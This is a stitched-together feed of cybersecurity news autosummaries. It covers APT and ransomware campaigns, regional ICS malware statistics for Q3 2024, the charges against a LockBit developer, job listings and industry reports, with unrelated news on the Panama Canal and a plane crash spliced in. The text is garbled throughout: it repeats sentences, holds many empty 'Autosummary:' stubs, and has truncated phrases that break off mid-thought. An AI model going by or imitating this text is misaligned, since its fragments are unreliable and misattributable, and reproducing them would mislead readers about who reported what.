exfiltration has been observed through the use of tools such as PuTTY, Amazon AWS S3 buckets/tools, HTTP POST requests, WinSCP, Rclone, Cobalt Strike, Metasploit, and other methods. The CMoon worm, which spread through a compromised the website of a Russian energy company, and the TIDRONE/Operation WordDrone attacks, which appear to be either supply chain attacks or exploiting a vulnerability in an ERP product to gain initial access to the victim’s systems, reiterate the point that these widely discussed attack vectors, when a third-party service is compromised by the attacker to infect other systems, should by no means be excluded from the threat models of modern industrial enterprises.Organizations in the USA, UK, Netherlands, Cyprus, Sweden, Germany, Singapore, Hong Kong and Australia have been targeted.For other tasks, Head Mare primarily uses publicly available software in its attacks, such as Sliver (the main C2 framework for attackers), ngrok, rsockstun (both used for pivoting), XenAllPasswordPro, and Mimikatz.This service enables a full range of activities, including scalable bot exploitation, vulnerability and exploit management, remote management of C2 infrastructure, file uploads and downloads, remote command execution, and the ability to tailor IoT-based DDoS attacks at scale.The authoring agencies identified the threat actor as primarily targeting defense, aerospace, nuclear, and engineering organizations in the USA, Japan, South Korea, and India.The APT group is known for using spear phishing to impersonate government agencies or banking institutions to distribute various publicly available Trojans, such as AsyncRAT, BitRAT, Lime RAT, NjRAT, Quasar RAT, and Remcos RAT.Files containing saved passwords, cookies, bookmarks, browsing history, and information for autofilling forms, including credit card information, could be collected from web browsers. RansomHub attacks The US Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Multi-State Information Sharing and Analysis Center (MS-ISAC), and Department of Health and Human Services (HHS) issued a joint Cybersecurity Advisory (CSA) on August 29 containing information relevant to the RansomHub ransomware-as-a-service (RaaS) group (formerly known as Cyclops and Knight). Middle East-related activity Peach Sandstorm attacks Between April and July, Microsoft researchers observed the Peach Sandstorm threat actor (aka APT33, Elfin and Refined Kitten) deploy a new custom multi‑stage backdoor dubbed Tickler in attacks against the satellite, communications equipment and oil and gas sectors, as well as federal and state government sectors in the USA and UAE. "Autosummary:
The researchers observed shell commands that perform data theft (e.g. collecting cryptocurrency wallet keys, documents, images, and other valuable information). "Autosummary:
"Autosummary:
"Autosummary:
A ransomware attack disrupted services at Pittsburgh Regional Transit Pierluigi Paganini December 26, 2024 December 26, 2024 A ransomware attack on Pittsburgh Regional Transit (PRT) was the root cause of the agency’s service disruptions. "Autosummary:
"Autosummary:
Comparative analysis Latin America occupies leading positions among regions by percentage of ICS computers on which the following were blocked: First place – malicious documents Second place – malicious scripts and phishing pages, threats from email clients Threat categories Compared to global figures, the region has a higher percentage of ICS computers on which the following threat categories were blocked: Malicious documents, 2.1 times higher Malicious scripts and phishing pages, 1.4 times higher Spyware, 1.2 times higher Web miners, 1.1 times higher Threat sources The region ranked second in the world by percentage of ICS computers on which malicious threats from email clients were blocked, exceeding the global average by 1.8 times. Comparative analysis Southern Europe occupies leading positions among regions by percentage of ICS computers on which the following were blocked: First place – threats from email clients Second place – malicious documents Third place – malicious scripts and phishing pages among regions by percentage of ICS computers on which the following were blocked: Threat categories Compared to the global average , the region has a higher percentage of ICS computers on which the following were blocked: Malicious documents, 1.7 times higher Spyware, 1.4 times higher Malicious scripts and phishing pages, 1.3 times higher Ransomware, 1.3 times higher , the region has a higher percentage of ICS computers on which the following were blocked: Threat sources Southern Europe ranked first in the world by percentage of ICS computers where malicious threats from email clients were blocked, surpassing the global average by 2 times. Comparative analysis In Q3 2024, Central Asia occupied leading positions among regions by percentage of ICS computers on which the following were blocked: First place: miner executable files for Windows Second place: worms Threat categories Compared to the global average , the region has a higher percentage of ICS computers on which the following were blocked: Miners in the form of executable files for Windows, 2.3 times higher Worms, 2.2 times higher Ransomware, 1.1 times higher Spyware, 1.1 times higher , the region has a higher percentage of ICS computers on which the following were blocked: Threat sources The percentage of ICS computers on which threats from removable devices were blocked exceeded the global average by 1.4 times in Q3 2024. Threat categories Compared to the global average , the region has a noticeably higher percentage of ICS computers on which the following were blocked: Web miners, 1.4 times higher Spyware, 1.3 times higher Miners in the form of executable files for Windows, 1.1 times higher Malicious documents, 1.1 times higher Worms, 1.1 times higher , the region has a noticeably higher percentage of ICS computers on which the following were blocked: Threat sources In Q3 2024, East Asia ranked first again among the regions by percentage of ICS computers where malicious threats from network folders were blocked, surpassing the global average by 2.7 times. Industries The most affected industries in the region, as selected for this report, are: Construction Building automation industries in the region, as selected for this report, are: Compared to the global averages , the following industries had a significantly higher percentage of ICS computers with blocked malicious objects compared to the respective global averages : Manufacturing – 1.5 times higher Construction – 1.4 times Electric power – 1.3 times Building automation – 1.2 times higher Engineering and ICS integration – 1.2 times , the following industries had a significantly of ICS computers with blocked malicious objects compared to the respective global averages In Q3 2024, all selected sectors experienced an increase in the percentage of ICS computers where malicious objects were blocked. Threat categories Compared to the global figures, the region has a higher percentage of ICS computers on which the following were blocked: Web miners, 1.4 times higher Spyware, 1.3 times higher Miners in the form of executable files for Windows, 1.1 times higher Malicious documents, 1.1 times higher Worms, 1.1 times higher Threat sources Threats from email clients exceeded the global average by 1.5 times.Compared to the global figures , the region has a significantly higher percentage of ICS computers on which the following were blocked: AutoCAD malware, 6.9 times higher Viruses, 5.4 times higher Spyware, 1.4 times higher Malicious scripts and phishing pages, 1.3 times higher Worms, 1.3 times higher Malicious documents, 1.2 times higher , the region has a significantly of ICS computers on which the following were blocked: Threat sources The region ranked second in the world by percentage of ICS computers on which threats from network folders were blocked, exceeding the global average by 2.6 times. Specifically, the following threat categories showed significantly higher values: Ransomware, 1.8 times higher Worms, 1.7 times higher Spyware, 1.6 times higher Web miners, 1.6 times higher Viruses, 1.3 times higher Malicious scripts and phishing pages, 1.3 times higher Malicious documents, 1.3 times higher values: Threat sources The region ranked third in the world by percentage of ICS computers on which threats from internet and email clients were blocked, exceeding the global average by a factor of 1.1 and 1.7 respectively. industry in the region, as selected for this report, is Compared to the global averages, the following industries had a significantly higher percentage of ICS computers with blocked malicious objects compared to the respective global averages : Construction – 1.7 times higher Manufacturing – 1.6 times higher Engineering & ICS Integration – 1.5 times higher Oil & Gas – 1.4 times higher Electric Power – 1.4 times higher the following industries had a significantly higher percentage of ICS computers with blocked malicious objects compared to the respective global averages In Q3 2024, all selected sectors in the region, except oil & gas, exhibited an increase in the percentage of ICS computers on which malicious objects were blocked. Comparative analysis Africa occupies leading positions among regions by percentage of ICS computers on which the following were blocked: First place: denylisted internet resources, malicious scripts and phishing pages, spyware, worms, threats from internet and removable devices Second place: web miners, ransomware, viruses Threat categories Compared to global figures, the region has a higher percentage of ICS computers on which threats were blocked across all threat categories. Ransomware, 1.8 times higher Spyware, 1.7 times higher Denylisted internet resources, 1.6 times higher Web miners, 1.4 times higher Malicious scripts and phishing pages, 1.4 times higher Malware for AutoCAD, 1.4 times higher percentage percentages of ICS computers on which the following were blocked Threat sources The region ranked first in the world both by percentage of ICS computers on which threats from internet and removable devices were blocked, exceeding the global average by 1.4 times and 4.6 times respectively. Compared to the respective global averages , the following sectors in the region saw a higher percentage of ICS computers on which malicious objects were blocked: Electric power, 1.3 times higher Construction, 1.2 times higher , the following sectors in the region saw a of ICS computers on which malicious objects were blocked: In Q3 2024, all sectors, except for manufacturing, exhibited an increase in the percentage of ICS computers on which malicious objects were blocked. Comparative analysis South Asia occupies leading positions among regions by percentage of ICS computers on which the following were blocked: Second place – threats from removable devices Third place – miners in the form of executable files for Windows, ransomware, threats from network folders Threat categories Compared to the global average, the region has a noticeably higher percentage of ICS computers on which the following were blocked: Worms, 1.4 times higher. Comparative analysis Threat categories Compared to the global average , the region has a noticeably higher percentage of ICS computers on which the following were blocked: Malicious scripts and phishing pages – 1.2 times higher Malicious documents – 1.1 times higher , the region has a noticeably of ICS computers on which the following were blocked: Threat sources The percentage of ICS computers on which threats from email clients were blocked surpassed the global average by a factor of 1.1. From a global perspective , the following industries saw a higher percentage of ICS computers on which malicious objects were blocked : Construction – 1.3 times higher Electric power – 1.2 times higher Oil and gas – 1.2 times higher Building automation – 1.1 times higher Engineering & ICS Integration – 1.1 times higher , the following industries saw a of ICS computers on which malicious objects were blocked In Q3 2024, the electric power sector exhibited the most noticeable increase (by a factor of 1.1) in the percentage of ICS computers on which malicious objects were blocked, compared to the previous quarter. Comparative analysis South-East Asia occupies leading positions among regions by percentage of ICS computers on which the following were blocked: First place: viruses, malware for AutoCAD Second place: denylisted internet resources, threats from the internet, threats from network folders Third place: malicious spyware Threat categories Viruses came second in the ranking of malware categories by percentage of ICS computers on which they were blocked. Quarterly changes and trends Threat categories Compared to the previous quarter, the largest proportional increase was in the percentage of ICS computers on which the following were blocked: Malicious documents – 1.4 times higher Malicious scripts and phishing pages – 1.1 times higher was in the percentage of ICS computers on which the following were blocked: The top threat categories exhibit various quarterly dynamics: The heatmap below illustrates changes in the rankings of threat categories in the region since the beginning of 2022. Quarterly changes and trends Threat categories The largest proportional increase in Q3 2024 was in the percentage of ICS computers on which the following were blocked : Denylisted internet resources – by 1.5 times Malicious scripts and phishing pages – by 1.4 times Malicious documents – by 1.2 times Ransomware – by 1.1 times in Q3 2024 was in the percentage of ICS computers on which the following were blocked The top threat categories exhibit various quarterly dynamics: The heatmap below illustrates changes in the ranking of threat categories in the region since the beginning of 2022. Quarterly changes and trends Threat categories The largest proportional increase in Q3 2024 was in the percentage of ICS computers on which the following were blocked: Denylisted internet resources – by 1.5 times Malicious scripts and phishing pages – by 1.1 times Malicious documents – by 1.1 times in Q3 2024 was in the percentage of ICS computers on which the following were blocked: The top threat categories exhibit various quarterly dynamics: The heatmap below illustrates changes in the rankings of threat categories in the region since the beginning of 2022. Quarterly changes and trends Threat categories The largest proportional increase in Q3 2024 was in the percentage of ICS computers on which the following were blocked: Malicious scripts and phishing pages, by 1.1 times Denylisted internet resources, by 1.1 times The top threat categories exhibit various quarterly dynamics: The heat map below illustrates changes in the rankings of threat categories in the region since the beginning of 2022. Quarterly changes and trends Threat categories The largest proportional increase in Q3 2024 was in the percentage of ICS computers on which the following were blocked: Malware for AutoCAD – by 1.8 times Malicious documents – by 1.3 times Malicious scripts and phishing pages – by 1.3 times Denylisted internet resources – by 1.2 times Viruses – by 1.1 times. Quarterly changes and trends Threat categories he largest proportional increase in Q3 2024 was in the percentage of ICS computers on which the following were blocked: Malicious documents – 1.4 times higher Malicious scripts and phishing pages – 1.1 times higher in was in the percentage of ICS computers on which the following were blocked: The top threat categories exhibit various quarterly dynamics: The heatmap below illustrates changes in the rankings of threat categories in the region since the beginning of 2022. Quarterly changes and trends Threat categories The largest proportional increase in Q3 2024 was in the percentage of ICS computers on which the following were blocked: Denylisted internet resources – by 1.3 times Malicious scripts and phishing pages – by 1.2 times in Q3 2024 was in the percentage of ICS computers on which the following were blocked: The top threat categories exhibit various quarterly dynamics: The heatmap below illustrates changes in the ranking of threat categories in the region since the beginning of 2022.This group includes Windows computers that serve one or several of the following purposes: Supervisory control and data acquisition (SCADA) servers Building automation servers Data storage (Historian) servers Data gateways (OPC) Stationary workstations of engineers and operators Mobile workstations of engineers and operators Human machine interface (HMI) Computers used to manage technological and building automation networks Computers of ICS/PLC programmers Computers that share statistics with us belong to organizations from various industries. Regions ranked by percentage of ICS computers on which spyware was blocked, Q3 2024 In almost all regions, spyware does not rank higher than third in the threat category rankings by percentage of ICS computers on which it was blocked, except in the following regions: East Asia : in this region, spyware is the number one malware category in terms of the percentage of ICS computers on which it was blocked. Regions ranked by percentage of ICS computers on which malicious objects were blocked, Q3 2024 All regions ranked by percentage of ICS computers on which malicious objects were blocked in the third quarter can be divided into three groups: Over 25% Africa – 31.5% South-East Asia – 30% Middle East – 25.6% In the regions within this group, OT computers are generally overexposed to cyberthreats. "Autosummary:
This group includes Windows computers that serve one or several of the following purposes: Supervisory control and data acquisition (SCADA) servers Building automation servers Data storage (Historian) servers Data gateways (OPC) Stationary workstations of engineers and operators Mobile workstations of engineers and operators Human machine interface (HMI) Computers used to manage technological and building automation networks Computers of ICS/PLC programmers Computers that share statistics with us belong to organizations from various industries. The phishing lures were distributed through various channels, including phishing emails (e.g., fake vulnerability notifications claiming to be from GitHub), malicious links, and malvertising networks found on adult sites, file sharing services, betting platforms, anime resources, and web apps that monetize through traffic.Q3 in numbers Parameter Q2 2024 Q3 2024 Quarterly changes Global percentage of attacked ICS computers 23.5% 22.0% -1.5 pp Percentage of ICS computers on which malicious objects from different categories were blocked Denylisted internet resources 6.63% 6.84% 0.21 pp Malicious scripts and phishing pages (JS and HTML) 5.69% 6.24% 0.55 pp Spy Trojans, backdoors and keyloggers 4.08% 3.91% -0.17 pp Malicious documents (MSOffice + PDF) 1.96% 1.97% 0.01 ppThe most common are the chemical industry, metallurgy, ICS design and integration, oil and gas, energy, transport and logistics, food industry, light industry, pharmaceuticals. Percentage of ICS computers on which malicious objects were blocked, by month, 2022–2024 Regionally*, the percentage of ICS computers that blocked malicious objects during the quarter ranged from 9.7% in Northern Europe to 31.5% in Africa. Percentage of ICS computers on which malicious objects were blocked, by quarter, 2022-2024 Compared to the third quarter of 2023, the percentage decreased by 1.7 pp. Percentage of ICS computers on which malicious objects were blocked in selected industries Diversity of detected malicious objects Malicious objects of various categories, which Kaspersky products block on ICS computers, can be divided into three groups according to their distribution method and purpose. "Autosummary:
"Autosummary:
"Autosummary:
While the statements might be "coercive", said Mr Freeman, it remained to be seen "whether canal authorities lower fees on US cargo in response to the threat". "Application Security DevOps engineer Twixor | India | On-site – View job details As an Application Security DevOps engineer, you will Implement and oversee application security measures to protect company’s software and infrastructure. Conduct regular security assessments and vulnerability testing. Develop and maintain secure coding practices and standards. Design, implement, and maintain secure CI/CD pipelines. Perform threat modeling and risk assessments. Application Security Engineer Webster Bank | USA | On-site – View job details As … More
The post Cybersecurity jobs available right now: December 24, 2024 appeared first on Help Net Security.
"Autosummary:
SOC Cyber Security Senior Analyst Honeywell | Romania | Hybrid – View job details As a SOC Cyber Security Senior Analyst, you will monitor SIEM, trouble tickets, email notifications, and in-person escalations, as well as logs from infrastructure components, applications, or network devices such as firewalls and IDS/IPS. Senior Cybersecurity Threat Intelligence Engineer Stratasys | Israel | On-site – View job details As a Senior Cybersecurity Threat Intelligence Engineer, you will lead proactive threat hunting initiatives to detect sophisticated cyber threats, attack vectors, and vulnerabilities across all environments (on-premises, cloud, hybrid). Threat Intelligence Analyst ASOS.com | United Kingdom | On-site – View job details As a Threat Intelligence Analyst, you will monitor and gather threat intelligence from an array of sources, including OSINT, dark web forums, industry feeds, and other relevant data sources. Head of Security Jade Software | New Zealand | On-site – View job details As a Head of Security, you will manage, maintain and continuously improve company-wide security risk management, compliance, and operational security processes. "In the Internet of Things (IoT) sector, 2025 is shaping up to be a politically charged year. Major global jurisdictions are set to implement device security regulations, coinciding with potential tariffs, shifting production dynamics, and rising geopolitical tensions. My advice for companies involved in manufacturing or using IoT devices? Prepare for the worst, but hope for the best. Geopolitical tensions are impacting IoT There’s no denying that the macro landscape is splintered. Internet infrastructure is … More
The post 2025 is going to be a bumpy year for IoT appeared first on Help Net Security.
"Autosummary:
Major global jurisdictions are set to implement device security regulations, coinciding with potential tariffs, shifting production dynamics, and rising geopolitical tensions. Governments are kicking into action At the same time, and likely in response to the above, governments are introducing big legislative changes to encourage better device practices. "McAfee’s predictions for 2025 highlight emerging threats that consumers may encounter as cybercriminals exploit advanced AI technology. From hyper-realistic deepfakes and live video scams to AI-driven phishing, smishing, and malware attacks, these predictions reveal how cybercriminals are using AI-powered tools to craft increasingly sophisticated and personalized cyber scams. “As AI continues to mature and become increasingly accessible, cybercriminals are using it to create scams that are more convincing, personalized, and harder to detect,” said Abhishek … More
The post AI-driven scams are about to get a lot more convincing appeared first on Help Net Security.
"Autosummary:
As cryptocurrency values climb and hype around the alternative currency increases, scammers are zeroing in on consumers’ digital wallets with fake investment schemes, phishing attacks, and malware designed to steal wallet keys, sell bogus crypto investments, or “pump and dump” – when scammers trick others into buying a cryptocurrency by hyping it up to inflate its price and then sell their shares for a profit when the price is high – causing the value to crash and leaving other investors with worthless assets. “As AI continues to mature and become increasingly accessible, cybercriminals are using it to create scams that are more convincing, personalized, and harder to detect,” said Abhishek Karnik, Head of Threat Research, McAfee. "Autosummary:
"Autosummary:
The CVE-2024-50379 mitigation was incomplete, requiring configuration based on Java version: Java 8/11 : Set sun.io.useCanonCaches to false (default is true ). "Autosummary:
"Autosummary:
It added that it had conducted a "detailed review" of the working and living conditions for subcontracted employees, and asked on "several occasions" for the construction firm to make improvements. "Autosummary:
Clop achieves another major breach The Cleo data theft attack represents another major success for Clop, who leveraged leveraging a zero-day vulnerability in Cleo LexiCom, VLTransfer, and Harmony products to steal data from the networks of breached companies. "Autosummary:
"Autosummary:
Clop achieves another major breach The Cleo data theft attack represents another major success for Clop, who leveraged leveraging a zero-day vulnerability in Cleo LexiCom, VLTransfer, and Harmony products to steal data from the networks of breached companies. "Autosummary:
Adobe is aware that ColdFusion bug CVE-2024-53961 has a known PoC exploit code Pierluigi Paganini December 24, 2024 December 24, 2024 Adobe released out-of-band security updates to address a critical ColdFusion vulnerability, experts warn of a PoC exploit code available for it. "Autosummary:
"Although employing complex decryption methods isn"t new, it suggests evolving tactics, techniques, and procedures among Mirai-based botnet operators," comments Akamai. "Autosummary:
"Autosummary:
"As these threat actors become increasingly strategic and harder to detect, organizations must take all measures to protect their data, including cybersecurity training. In this Help Net Security video, Rodman Ramezanian, Global Cloud Threat Lead at Skyhigh Security, discusses how companies can defend themselves against threats and be prepared for future ones.
The post How companies can fight ransomware impersonations appeared first on Help Net Security.
"Autosummary:
"With outdated and inadequately maintained components, along with insecure dependencies, the open-source ecosystem presents numerous risks that could expose organizations to threats. In this article, you will find excerpts from 2024 open-source security reports that can help your organization strengthen its software security practices. 70% of open-source components are poorly or no longer maintained Regardless of geographic origin, the average mid-size application has several disturbing trends leading to critical vulnerabilities. Open-source contributes 2 to 9 times … More
The post What open source means for cybersecurity appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"A six-count indictment was unsealed on Friday in Los Angeles charging two California men with defrauding investors of more than $22 million in cryptocurrency through a series of digital asset project “rug pulls,” a type of fraud scheme in which the creator of a nonfungible token (NFT) or other digital asset project solicits funds from investors for the project and then abruptly abandons the project and fraudulently retains investors’ funds. Both men were arrested on … More
The post NFT scammers charged for stealing $22 million through “rug pulls” appeared first on Help Net Security.
"Autosummary:
Hay, Mayo, and others allegedly used these tactics with a variety of digital asset projects, including Vault of Gems, Faceless, Sinful Souls, Clout Coin, Dirty Dogs, Uncovered, MoonPortal, Squiggles, and Roost Coin. "Autosummary:
The most frequently targeted countries using FlowerStorm include the United States, Canada, the United Kingdom, Australia, Italy, Switzerland, Puerto Rico, Germany, Singapore, and India. "Autosummary:
Meanwhile, attackers create bots that behave like real users by mimicking human actions such as typing, clicking, or scrolling, making them difficult to detect using standard security methods. AI-driven attacks, such as deepfake impersonations and convincing phishing scams, are also likely to become more prevalent, making insider threats harder to detect.For example, in a recent attack on Ford, attackers exploited the company"s supply chain to insert malicious code into Ford"s systems, creating a backdoor that the attackers could use to expose sensitive customer data.These systems take into account user behavior, location, and device type to make intelligent, risk-based decisions about access control.The threat of insider attacks Insider threats are expected to intensify in 2025 due to the continued rise of remote work, AI-powered social engineering, and evolving data privacy concerns. "The US Department of Justice has unsealed charges against Rostislav Panev, 51, a dual Russian and Israeli national, suspected of being a developer for the LockBit ransomware group. Panev was arrested in August 2024 and is currently in custody in Israel pending extradition. The charges “According to the superseding complaint, documents filed in this and related cases, and statements made in court, Panev acted as a developer of the LockBit ransomware group from its inception … More
The post US charges suspected LockBit ransomware developer appeared first on Help Net Security.
"Autosummary:
The criminal complaint says that at the time of Panev’s arrest, Israeli law enforcement found on his computer: Administrator credentials for a dark web online repository, where source code for multiple versions of the LockBit builder were stored, along with source code for LockBit’s StealBit data exfiltration tool Access credentials for the LockBit control panel, an online dashboard maintained by LockBit developers for LockBit’s affiliates The complaint also alleges that Panev was in contact with Lockbit’s alleged primary administrator- Dimitry Yuryevich Khoroshev, aka LockBitSupp – and discussed work that needed to be done on the LockBit builder and control panel. "Autosummary:
"Specifically, we show a hyperparameter stealing attack that can extract all layer configurations including the layer type, number of nodes, kernel/filter sizes, number of filters, strides, padding, and activation function," the researchers said. "Autosummary:
The list includes — CVE-2024-12727, CVE-2024-12728, CVE-2024-12729 (Sophos Firewall), CVE-2023-48788 (Fortinet FortiClient EMS), CVE-2023-34990, (Fortinet FortiWLM), CVE-2024-12356 (BeyondTrust Privileged Remote Access and Remote Support), CVE-2024-6386 (WPML plugin), CVE-2024-49576, CVE-2024-47810 (Foxit Software), CVE-2024-49775 (Siemens Opcenter Execution Foundation), CVE-2024-12371, CVE-2024-12372, CVE-2024-12373 (Rockwell Automation PowerMonitor 1000), CVE-2024-52875 (GFI KerioControl), CVE-2024-56145 (Craft CMS), CVE-2024-56050, CVE-2024-56052, CVE-2024-56054, CVE-2024-56057 (VibeThemes WPLMS), CVE-2024-12626 (AutomatorWP plugin), CVE-2024-11349 (AdForest theme), CVE-2024-51466 (IBM Cognos Analytics), CVE-2024-10244 (ISDO Software Web Software), CVE-2024-4995 (Wapro ERP Desktop), CVE-2024-10205 (Hitachi Ops Center Analyzer), and CVE-2024-46873 (Sharp router) 📰 Around the Cyber World Recorded Future Gets Labeled "Undesirable" in Russia — Russian authorities have tagged U.S. threat intelligence firm Recorded Future as an "undesirable" organization, accusing it of participating in propaganda campaigns and cyberattacks against Moscow."These tools enable capabilities such as keystroke logging, data exfiltration, security bypasses, and covert system control, suggesting that the campaign is part of a potentially prolonged espionage effort," Rapid7 said, describing it as an advanced and targeted threat."These tools enable capabilities such as keystroke logging, data exfiltration, security bypasses, and covert system control, suggesting that the campaign is part of a potentially prolonged espionage effort," Rapid7 said, describing it as an advanced and targeted threat.Some of the most impacted verticals included manufacturing, industrial control systems (ICS) equipment and engineering, transportation, communications, oil and gas, electric, and government.Some of the most impacted verticals included manufacturing, industrial control systems (ICS) equipment and engineering, transportation, communications, oil and gas, electric, and government.The group, first documented by Kaspersky back in early 2014, infected the company with malware such as FakeHMP, Careto2, and Goreto that are designed to harvest files, keystrokes, and screenshots; run shell commands; and deploy more malware.The group, first documented by Kaspersky back in early 2014, infected the company with malware such as FakeHMP, Careto2, and Goreto that are designed to harvest files, keystrokes, and screenshots; run shell commands; and deploy more malware. ⚡ Threat of the Week LockBit Developer Rostislav Panev Charged in the U.S. — Rostislav Panev, a 51-year-old dual Russian and Israeli national, has been charged in the U.S. for allegedly acting as the developer of the now-disrupted LockBit ransomware-as-a-service (RaaS) operation, netting about $230,000 between June 2022 and February 2024.HeartCrypt Packer-as-a-Service Operation Exposed — A new packer-as-a-service (PaaS) called HeartCrypt has been advertised for sale on Telegram and underground forums since February 2024 to protect malware such as Remcos RAT, XWorm, Lumma Stealer, and Rhadamanthys.This being one," Recorded Future"s chief executive, Christopher Ahlberg, wrote on X. Russian authorities have tagged U.S. threat intelligence firm Recorded Future as an "undesirable" organization, accusing it of participating in propaganda campaigns and cyberattacks against Moscow."In HeartCrypt"s PaaS model, customers submit their malware via Telegram or other private messaging services, where the operator then packs and returns it as a new binary," Palo Alto Networks Unit 42 said, adding it identified over 300 distinct legitimate binaries that were used to inject the malicious payload. "Autosummary:
"Autosummary:
"Autosummary:
It is part of the AgraGuard suite of products, which includes USAHERDS, USALIMS, USAPlants, USAFoodSafety, and USAMeals, aimed at supporting agricultural and food safety operations. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: MUT-1244 targeting security researchers, red teamers, and threat actors A threat actor tracked as MUT-1244 by DataDog researchers has been targeting academics, pentesters, red teamers, security researchers, as well as other threat actors, in order to steal AWS access keys, WordPress account credentials and other sensitive data. Kali Linux 2024.4 released! 14 new shiny tools added Kali Linux 2024.4 includes … More
The post Week in review: MUT-1244 targets both security workers and threat actors, Kali Linux 2024.4 released appeared first on Help Net Security.
"Autosummary:
Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: MUT-1244 targeting security researchers, red teamers, and threat actors A threat actor tracked as MUT-1244 by DataDog researchers has been targeting academics, pentesters, red teamers, security researchers, as well as other threat actors, in order to steal AWS access keys, WordPress account credentials and other sensitive data. Balancing security and user experience to improve fraud prevention strategies In this Help Net Security interview, Jennifer White, Senior Director for Banking and Payments Intelligence at J.D. Power, discusses how financial institutions can improve customer satisfaction during fraud resolution, covering proactive fraud prevention, clear communication, and empathetic issue resolution. "Autosummary:
“As alleged in the superseding complaint, at the time of Panev’s arrest in Israel in August, law enforcement discovered on Panev’s computer administrator credentials for an online repository that was hosted on the dark web and stored source code for multiple versions of the LockBit builder, which allowed LockBit’s affiliates to generate custom builds of the LockBit ransomware malware for particular victims. "Autosummary:
"Autosummary:
Trump threatens to try to regain control of Panama Canal Getty Images Trump made his remarks in front of thousands at Turning Point"s annual conference, one of the country"s largest gatherings of conservative activists President-elect Donald Trump has demanded Panama reduce fees on the Panama Canal or return it to US control, accusing the central American country of charging "exorbitant prices" to American shipping and naval vessels. "Autosummary:
Brazilian businessman Luiz Claudio Galeazzi, who was piloting the plane, was killed in the crash alongside his wife, three daughters and other family members, a statement from his company said. "Autosummary:
" With the latest arrest, a total of seven LockBit members – Mikhail Vasiliev, Ruslan Astamirov, Artur Sungatov, Ivan Gennadievich Kondratiev, Mikhail Pavlovich Matveev – have been charged in the U.S. Despite these operational setbacks, the LockBit operators appear to be plotting a comeback, with a new version LockBit 4.0 scheduled for release in February 2025. "Once a co-conspirator sold the data, Antonenko and others used Bitcoin as well as traditional bank and cash transactions to launder the proceeds in order to disguise their nature, location, source, ownership, and control," the DoJ noted in May 2020. "Autosummary:
“The Department of Justice today announced a coordinated international law enforcement action to disrupt a sophisticated form of ransomware known as NetWalker.” reads the press release published by DoJ. “NetWalker ransomware has impacted numerous victims, including companies, municipalities, hospitals, law enforcement, emergency services, school districts, colleges, and universities. "Autosummary:
To protect against phishing attacks, use multi-factor authentication (MFA) with AiTM-resistant FIDO2 tokens, deploy email filtering solutions, and use DNS filtering to block access to suspicious domains like .ru, .moscow, and .dev. "AI changes how organizations look at cybersecurity GenAI is compromising security while promising efficiency This article highlights key findings from 2024 reports on AI and GenAI technologies, focusing on their potential and major challenges. Overreliance on GenAI to develop software compromises security 96% of security and software development professionals report that their companies use GenAI-based solutions for building or delivering applications. Among these respondents, 79% report that all or most of their development teams regularly … More
The post AI is becoming the weapon of choice for cybercriminals appeared first on Help Net Security.
"Autosummary:
As today’s risks are increasingly driven by AI and GenAI, the way employees work, and the proliferation of cloud applications, respondents state they need more visibility into source code sent to repositories (88%), files sent to personal cloud accounts (87%), and customer relationship management (CRM) system data downloads (90%). 92% of security pros have security concerns around generative AI, with specific apprehensions including employees entering sensitive company data into an AI tool (48%), using AI systems trained with incorrect or malicious data (44%), and falling for AI-enhanced phishing attempts (42%).Nearly half of respondents describe their risk tolerance towards AI as very high (17%) or high (29%), while only 12% report a low (9%) or very low (3%) AI risk tolerance. "As the financial industry is the most targeted sector for data breaches in 2024, it’s now more important than ever to strengthen the industry moving into 2025, according to SailPoint. Financial institutions face growing cyber threats In 2024, roughly 65% of financial organizations worldwide reported experiencing a ransomware attack, compared to 64% in 2023 and 34% in 2021. 46% of financial companies recorded indicated they had a breach in just the last 24 months. 80% … More
The post 46% of financial institutions had a data breach in the past 24 months appeared first on Help Net Security.
"Autosummary:
“In addition to the complexity that mergers and acquisitions introduce to their identity landscape, the influx of machine and third-party identities with access privileges that require protection, and the increased amounts of unmanaged sensitive data have brought to light new areas of risk that, if left ungoverned and unprotected, will result in a growing number of data breaches targeting this sector of the enterprise market.” "Autosummary:
Affiliates of the NetWalker cybercrime gang have deployed this malware in attacks against hundreds of victims worldwide, including hospitals, law enforcement, emergency services, companies, municipalities, school districts, colleges, and universities. "In this Help Net Security interview, Anjos Nijk, Managing Director of the European Network for Cyber security (ENCS), discusses cybersecurity in the energy sector as it modernizes with renewable sources and smart grid technologies. Nijk also addresses the need for international collaboration, the impact of IoT on security, and the emerging technologies that can enhance the resilience and reliability of critical energy infrastructure. As the energy sector undergoes significant modernization, particularly with the integration of … More
The post Why cybersecurity is critical to energy modernization appeared first on Help Net Security.
"Autosummary:
So, we need to implement technology to maintain control, but also need to create the conditions for residential users, operators and integrators to securely install, operate and maintain their infrastructure. However, connected infrastructures, such as renewables and EV charging networks, fall outside the direct control of grid operators, and can also cause blackouts in the grid.In this Help Net Security interview, Anjos Nijk, Managing Director of the European Network for Cyber security (ENCS), discusses cybersecurity in the energy sector as it modernizes with renewable sources and smart grid technologies. "Autosummary:
"Autosummary:
"Autosummary:
" Since the breach, Ascension"s investigation has revealed that some of the stolen files contained patients" and employees" names and information across one or more of the following categories (the specific type of exposed information varies from one individual to another): Medical information, such as medical record numbers, dates of service, types of lab tests, or procedure codes, Payment information encompassing credit card information or bank account numbers, Insurance information containing Medicaid/Medicare IDs, policy numbers, or insurance claims, Government identification information, including Social Security numbers, tax identification numbers, driver"s license numbers, or passport numbers, And other personal information, such as dates of birth or addresses. "Autosummary:
Further investigation of the attack chain has revealed that the threat actor moved laterally from Host A to another machine (Host C), where CookieTime was again used to drop various payloads between February and June 2024, such as follows - LPEClient, a malware that comes fitted with capabilities to profile compromised hosts ServiceChanger, a malware that stops a targeted legitimate service so as to sideload a rogue DLL embedded within it using the executable via DLL side-loading Charamel Loader, a loader malware that decrypts and loads internal resources like CookieTime, CookiePlus, and ForestTiger CookiePlus, a new plugin-based malicious program that"s loaded by both ServiceChanger and Charamel Loader "The difference between each CookiePlus loaded by Charamel Loader and by ServiceChanger is the way it is executed. These activities often involve targeting developers and employees in various companies, including defense, aerospace, cryptocurrency, and other global sectors, with lucrative job opportunities that ultimately lead to the deployment of malware on their machines. "Autosummary:
" In an interesting twist, the attack also limits the infection to machines located in a specific set of countries, such as China, Russia, Hong Kong, Belarus, and Iran. "Autosummary:
